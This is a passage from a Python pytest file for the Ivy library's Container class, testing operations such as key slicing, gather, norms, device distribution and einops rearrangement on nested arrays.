cont_cutoff = cont
assert not cont_cutoff.a
assert not cont_cutoff.b
# height 4
cont = Container({"a": {"c": {"d": d_val}}, "b": {"c": {"d": {"e": e_val}}}})
cont_cutoff = cont.cutoff_at_height(4, inplace=inplace)
if inplace:
cont_cutoff = cont
assert not cont_cutoff
@pytest.mark.parametrize("str_slice", [True, False])
def test_container_slice_keys(str_slice, device, call):
# values
a_val = ivy.array([1], device=device)
b_val = ivy.array([2], device=device)
c_val = ivy.array([3], device=device)
d_val = ivy.array([4], device=device)
e_val = ivy.array([5], device=device)
# slice
if str_slice:
slc = "b:d"
else:
slc = slice(1, 4, 1)
# without dict
cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont_sliced = cont.slice_keys(slc)
assert "a" not in cont_sliced
assert np.allclose(ivy.to_numpy(cont_sliced.b), ivy.to_numpy(b_val))
assert np.allclose(ivy.to_numpy(cont_sliced.c), ivy.to_numpy(c_val))
assert np.allclose(ivy.to_numpy(cont_sliced.d), ivy.to_numpy(d_val))
assert "e" not in cont_sliced
# with dict, depth 0
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_cont])
assert Container.identical([cont_sliced.c, sub_cont])
assert Container.identical([cont_sliced.d, sub_cont])
assert "e" not in cont_sliced
# with dict, depth 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({1: slc})
assert Container.identical([cont_sliced.a, sub_sub_cont])
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert Container.identical([cont_sliced.e, sub_sub_cont])
# with dict, depth 0, 1
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys({0: slc, 1: slc})
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
# all depths
sub_cont = Container({"a": a_val, "b": b_val, "c": c_val, "d": d_val, "e": e_val})
sub_sub_cont = Container({"b": b_val, "c": c_val, "d": d_val})
cont = Container(
{"a": sub_cont, "b": sub_cont, "c": sub_cont, "d": sub_cont, "e": sub_cont}
)
cont_sliced = cont.slice_keys(slc, all_depths=True)
assert "a" not in cont_sliced
assert Container.identical([cont_sliced.b, sub_sub_cont])
assert Container.identical([cont_sliced.c, sub_sub_cont])
assert Container.identical([cont_sliced.d, sub_sub_cont])
assert "e" not in cont_sliced
def test_container_show(device, call):
if call is helpers.mx_call:
# ToDo: get this working for mxnet again, recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
cont = Container(dict_in)
print(cont)
cont.show()
def test_container_find_sub_container(device, call):
arr1 = ivy.array([1], device=device)
arr2 = ivy.array([2], device=device)
arr3 = ivy.array([3], device=device)
dict_in = {"a": arr1, "b": {"c": arr2, "d": arr3}}
top_cont = Container(dict_in)
# full
sub_cont = Container(dict_in["b"])
assert sub_cont in top_cont
found_kc = top_cont.find_sub_container(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_container(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": arr3})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == "b"
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
partial_sub_cont = Container({"b": {"d": arr3}})
found_kc = top_cont.find_sub_container(partial_sub_cont, partial=True)
assert found_kc == ""
assert partial_sub_cont.find_sub_container(top_cont, partial=True) is False
def test_container_find_sub_structure(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
# full
sub_cont = Container(
{"c": ivy.array([4], device=device), "d": ivy.array([5], device=device)}
)
assert not top_cont.find_sub_container(sub_cont)
found_kc = top_cont.find_sub_structure(sub_cont)
assert found_kc == "b"
found_kc = top_cont.find_sub_structure(top_cont)
assert found_kc == ""
# partial
partial_sub_cont = Container({"d": ivy.array([5], device=device)})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == "b"
partial_sub_cont = Container({"b": {"d": ivy.array([5], device=device)}})
found_kc = top_cont.find_sub_structure(partial_sub_cont, partial=True)
assert found_kc == ""
def test_container_show_sub_container(device, call):
if call is helpers.mx_call:
        # ToDo: get this working for mxnet again; a recent version update caused errors.
pytest.skip()
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
top_cont = Container(dict_in)
sub_cont = Container(dict_in["b"])
top_cont.show_sub_container("b")
top_cont.show_sub_container(sub_cont)
def test_container_from_dict_w_cont_types(device, call):
# ToDo: add tests for backends other than jax
if call is not helpers.jnp_call:
pytest.skip()
from haiku._src.data_structures import FlatMapping
dict_in = {
"a": ivy.array([1], device=device),
"b": FlatMapping(
{"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)}
),
}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
def test_container_from_kwargs(device, call):
container = Container(
a=ivy.array([1], device=device),
b={"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([3]))
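# When list or tuple is passed via types_to_iteratively_nest, the items are
# nested under numbered keys it_0, it_1, ..., as the two tests below check.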
def test_container_from_list(device, call):
list_in = [
ivy.array([1], device=device),
[ivy.array([2], device=device), ivy.array([3], device=device)],
]
container = Container(list_in, types_to_iteratively_nest=[list])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_from_tuple(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
assert np.allclose(ivy.to_numpy(container["it_0"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container.it_0), np.array([1]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_0"]), np.array([2]))
assert np.allclose(ivy.to_numpy(container.it_1.it_0), np.array([2]))
assert np.allclose(ivy.to_numpy(container["it_1"]["it_1"]), np.array([3]))
assert np.allclose(ivy.to_numpy(container.it_1.it_1), np.array([3]))
def test_container_to_raw(device, call):
tuple_in = (
ivy.array([1], device=device),
(ivy.array([2], device=device), ivy.array([3], device=device)),
)
container = Container(tuple_in, types_to_iteratively_nest=[tuple])
raw = container.to_raw()
assert np.allclose(ivy.to_numpy(raw[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(raw[1][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(raw[1][1]), np.array([3]))
def test_container_clip_vector_norm(device, call):
container = Container({"a": ivy.array([[0.8, 2.2], [1.5, 0.2]], device=device)})
container_clipped = container.clip_vector_norm(2.5, 2.0)
assert np.allclose(
ivy.to_numpy(container_clipped["a"]),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
assert np.allclose(
ivy.to_numpy(container_clipped.a),
np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]),
)
def test_container_einsum(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_einsummed = container.einsum("ij->i")
assert np.allclose(
ivy.to_numpy(container_einsummed["a"]), np.array([3.0, 7.0, 11.0])
)
assert np.allclose(ivy.to_numpy(container_einsummed.a), np.array([3.0, 7.0, 11.0]))
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["c"]), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.c), np.array([6.0, 14.0, 22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed["b"]["d"]), np.array([-6.0, -14.0, -22.0])
)
assert np.allclose(
ivy.to_numpy(container_einsummed.b.d), np.array([-6.0, -14.0, -22.0])
)
# def test_container_vector_norm(device, call):
# dict_in = {
# "a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
# "b": {
# "c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
# "d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
# },
# }
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(device, call):
if call is helpers.mx_call:
# MXNet does not support matrix norm
pytest.skip()
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[3.0, 6.0], [9.0, 12.0], [15.0, 18.0]], device=device),
},
}
container = Container(dict_in)
container_normed = container.matrix_norm()
assert np.allclose(ivy.to_numpy(container_normed["a"]), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed.a), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed["b"]["c"]), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed["b"]["d"]), 28.57655427)
assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.57655427)
def test_container_flip(device, call):
dict_in = {
"a": ivy.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], device=device),
"b": {
"c": ivy.array([[2.0, 4.0], [6.0, 8.0], [10.0, 12.0]], device=device),
"d": ivy.array([[-2.0, -4.0], [-6.0, -8.0], [-10.0, -12.0]], device=device),
},
}
container = Container(dict_in)
container_flipped = container.flip(-1)
assert np.allclose(
ivy.to_numpy(container_flipped["a"]),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.a),
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["c"]),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.c),
np.array([[4.0, 2.0], [8.0, 6.0], [12.0, 10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped["b"]["d"]),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
assert np.allclose(
ivy.to_numpy(container_flipped.b.d),
np.array([[-4.0, -2.0], [-8.0, -6.0], [-12.0, -10.0]]),
)
def test_container_as_ones(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_ones = container.as_ones()
assert np.allclose(ivy.to_numpy(container_ones["a"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["c"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones["b"]["d"]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.d), np.array([1]))
def test_container_as_zeros(device, call):
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
container = Container(dict_in)
container_zeros = container.as_zeros()
assert np.allclose(ivy.to_numpy(container_zeros["a"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["c"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.c), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros["b"]["d"]), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.d), np.array([0]))
def test_container_as_bools(device, call):
dict_in = {"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
container = Container(dict_in)
container_bools = container.as_bools()
assert container_bools["a"] is True
assert container_bools.a is True
assert container_bools["b"]["c"] is False
assert container_bools.b.c is False
assert container_bools["b"]["d"] is True
assert container_bools.b.d is True
def test_container_all_true(device, call):
assert not Container(
{"a": ivy.array([1], device=device), "b": {"c": [], "d": True}}
).all_true()
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_true(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_all_false(device, call):
assert Container({"a": False, "b": {"c": [], "d": 0}}).all_false()
assert not Container({"a": False, "b": {"c": [1], "d": 0}}).all_false()
# noinspection PyBroadException
try:
assert Container(
{"a": ivy.array([1], device=device), "b": {"c": [1], "d": True}}
).all_false(assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_as_random_uniform(device, call):
dict_in = {
"a": ivy.array([1.0], device=device),
"b": {
"c": ivy.array([2.0], device=device),
"d": ivy.array([3.0], device=device),
},
}
container = Container(dict_in)
container_random = container.as_random_uniform()
assert (ivy.to_numpy(container_random["a"]) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random.a) != np.array([1.0]))[0]
assert (ivy.to_numpy(container_random["b"]["c"]) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random.b.c) != np.array([2.0]))[0]
assert (ivy.to_numpy(container_random["b"]["d"]) != np.array([3.0]))[0]
assert (ivy.to_numpy(container_random.b.d) != np.array([3.0]))[0]
def test_container_clone(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# devices
devices = list()
device0 = device
devices.append(device0)
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
device1 = device[:-1] + str(idx)
devices.append(device1)
# without key_chains specification
container_cloned = container.dev_clone(devices)
assert isinstance(container_cloned, ivy.DevClonedItem)
    assert all(cont.dev_str == ds for ds, cont in container_cloned.items())
assert ivy.Container.multi_map(
lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]
).all_true()
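# dev_dist splits the leading (batch) dimension across the given devices; when
# the devices are supplied as a dict, the values give the per-device split sizes
# (here an even split of the batch of 4).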
@pytest.mark.parametrize("devs_as_dict", [True, False])
def test_container_distribute(devs_as_dict, device, call):
array_a = ivy.array([[1], [2], [3], [4]], device=device)
array_bc = ivy.array([[2], [3], [4], [5]], device=device)
array_bd = ivy.array([[3], [4], [5], [6]], device=device)
dict_in = {"a": array_a, "b": {"c": array_bc, "d": array_bd}}
container = Container(dict_in)
batch_size = array_a.shape[0]
if call is helpers.mx_call:
# MXNet does not support splitting along an axis with a remainder after division
pytest.skip()
# devices
dev0 = device
devices = [dev0]
if "gpu" in device and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = device[:-1] + str(idx)
devices.append(dev1)
if devs_as_dict:
devices = dict(zip(devices, [int((1 / len(devices)) * 4)] * len(devices)))
num_devs = len(devices)
sub_size = int(batch_size / num_devs)
# without key_chains specification
container_dist = container.dev_dist(devices)
assert isinstance(container_dist, ivy.DevDistItem)
    assert all(cont.dev_str == ds for ds, cont in container_dist.items())
for i, sub_cont in enumerate(container_dist.values()):
assert np.array_equal(
ivy.to_numpy(sub_cont.a),
ivy.to_numpy(array_a)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.c),
ivy.to_numpy(array_bc)[i * sub_size : i * sub_size + sub_size],
)
assert np.array_equal(
ivy.to_numpy(sub_cont.b.d),
ivy.to_numpy(array_bd)[i * sub_size : i * sub_size + sub_size],
)
def test_container_unstack(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_unstacked = container.unstack(0)
for cont, a, bc, bd in zip(container_unstacked, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"]), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"]), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"]), np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d), np.array([bd]))
def test_container_split(device, call):
dict_in = {
"a": ivy.array([[1], [2], [3]], device=device),
"b": {
"c": ivy.array([[2], [3], [4]], device=device),
"d": ivy.array([[3], [4], [5]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_split = container.split(1, -1)
for cont, a, bc, bd in zip(container_split, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont["a"])[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a)[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont["b"]["c"])[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c)[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont["b"]["d"])[0], np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d)[0], np.array([bd]))
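# The key_chains, to_apply and prune_unapplied arguments below follow the pattern
# used throughout these container tests: the listed chains are the only ones
# operated on (or, with to_apply=False, the only ones skipped), and
# prune_unapplied=True drops the leaves the operation was not applied to.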
def test_container_gather(device, call):
dict_in = {
"a": ivy.array([1, 2, 3, 4, 5, 6], device=device),
"b": {
"c": ivy.array([2, 3, 4, 5], device=device),
"d": ivy.array([10, 9, 8, 7, 6], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather(ivy.array([1, 3], device=device))
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["d"]), np.array([9, 7]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([9, 7]))
# with key_chains to apply
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"]
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device), -1, ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(ivy.to_numpy(container_gathered["a"]), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([1, 2, 3, 4, 5, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([10, 9, 8, 7, 6])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to not apply pruned
container_gathered = container.gather(
ivy.array([1, 3], device=device),
-1,
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered["b"]["c"]), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert "b/d" not in container_gathered
def test_container_gather_nd(device, call):
dict_in = {
"a": ivy.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]], device=device),
"b": {
"c": ivy.array([[[8, 7], [6, 5]], [[4, 3], [2, 1]]], device=device),
"d": ivy.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]], device=device),
},
}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], device=device))
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]), np.array([[6, 8], [10, 12]])
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]])
)
# with key_chains to apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"]
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device), ["a", "b/c"], prune_unapplied=True
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]), np.array([[3, 4], [5, 6]])
)
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
# with key_chains to not apply
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
)
assert np.allclose(
ivy.to_numpy(container_gathered["a"]),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.a),
np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["d"]),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
assert np.allclose(
ivy.to_numpy(container_gathered.b.d),
np.array([[[2, 4], [6, 8]], [[10, 12], [14, 16]]]),
)
# with key_chains to not apply pruned
container_gathered = container.gather_nd(
ivy.array([[0, 1], [1, 0]], device=device),
Container({"a": None, "b": {"d": None}}),
to_apply=False,
prune_unapplied=True,
)
assert "a" not in container_gathered
assert np.allclose(
ivy.to_numpy(container_gathered["b"]["c"]), np.array([[6, 5], [4, 3]])
)
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert "b/d" not in container_gathered
def test_container_einops_rearrange(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_rearranged = container.einops_rearrange("b n -> n b")
assert np.allclose(
ivy.to_numpy(container_rearranged["a"]), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged.a), np.array([[0.0], [1.0], [2.0], [3.0]])
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["c"]),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.c),
np.array([[5.0], [10.0], [15.0], [20.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged["b"]["d"]),
np.array([[10.0], [9.0], [8.0], [7.0]]),
)
assert np.allclose(
ivy.to_numpy(container_rearranged.b.d), np.array([[10.0], [9.0], [8.0], [7.0]])
)
def test_container_einops_reduce(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_reduced = container.einops_reduce("b n -> b", "mean")
assert np.allclose(ivy.to_numpy(container_reduced["a"]), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced.a), np.array([1.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["c"]), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.c), np.array([12.5]))
assert np.allclose(ivy.to_numpy(container_reduced["b"]["d"]), np.array([8.5]))
assert np.allclose(ivy.to_numpy(container_reduced.b.d), np.array([8.5]))
def test_container_einops_repeat(device, call):
dict_in = {
"a": ivy.array([[0.0, 1.0, 2.0, 3.0]], device=device),
"b": {
"c": ivy.array([[5.0, 10.0, 15.0, 20.0]], device=device),
"d": ivy.array([[10.0, 9.0, 8.0, 7.0]], device=device),
},
}
container = Container(dict_in)
container_repeated = container.einops_repeat("b n -> b n c", c=2)
assert np.allclose(
ivy.to_numpy(container_repeated["a"]),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.a),
np.array([[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["c"]),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.c),
np.array([[[5.0, 5.0], [10.0, 10.0], [15.0, 15.0], [20.0, 20.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated["b"]["d"]),
np.array([[[10.0, 10.0], [9.0, 9.0], [8.0, 8.0], [7.0, 7.0]]]),
)
assert np.allclose(
ivy.to_numpy(container_repeated.b.d),
